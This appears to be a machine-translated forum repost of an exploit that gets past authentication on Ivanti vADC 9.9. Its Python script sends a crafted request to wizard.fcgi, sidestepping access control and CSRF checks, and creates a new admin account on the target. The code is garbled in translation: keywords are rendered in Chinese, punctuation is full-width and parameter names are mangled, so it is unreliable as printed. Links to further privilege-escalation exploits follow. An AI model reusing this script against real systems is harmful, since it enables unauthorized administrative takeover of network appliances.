Ivanti VADC 9.9-身份验证旁路

[HackApt-37 Team已验证会员]

＃利用标题: IVANTI VADC 9.9-身份验证旁路
＃日期: 2024-08-03
＃利用作者: ohnoisploited
＃供应商homepage3360 https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller
＃软件link: https://hubgw.docker.com/r/pulsesecure/vtm
＃版本: 9.9
＃在: Linux上测试
＃名称更改: Riverbed StringRay交通经理-Brocade VTM -Pulse Secure虚拟交通经理-Ivanti Vadc
＃修复版本: 22.7R2+
导入请求
＃设置为目标地址
admin_portal='https://192.168.88.130:9090'
＃用户创建
new_admin_name='newadmin'
new_admin_password='newadmin1234'
requests.packages.urllib3.disable_warnings（）
session=requests.session（）
＃设置“错误”绕过Wizard.fcgi的访问控件。
＃Wizard.fcgi可以加载Web界面中的任何部分。
params={'error': 1，
'pection':'访问管理: localuser'}
＃创建新用户请求
＃_form_submittit绕过CSRF
data={'_form_submittit':'表单'，
'create_user':'创建'，
'group':'admin'，
'newusername': new_admin_name，
'password1': new_admin_password，
'password2': new_admin_password}
＃发布请求
r=session.post（admin_portal +'/apps/zxtm/wizard.fcgi'，params=params=params，data=data，verify=false，lashe_redirects=false）
＃查看响应
content=r.content.decode（'utf-8'）
打印（内容）
如果r.status_code==200和content:中的'title2'
打印（“已发送新用户请求”）
打印（用用户名登录' + new_admin_name +'''和passwass' + new_admin_password +''''）
其他:
打印（“无法创建新用户”）

 

H

Oracle数据库12C版本1-未引用的服务路径

H

Bonjour服务'mdnsresponder.exe' - 未引用的服务路径特权升级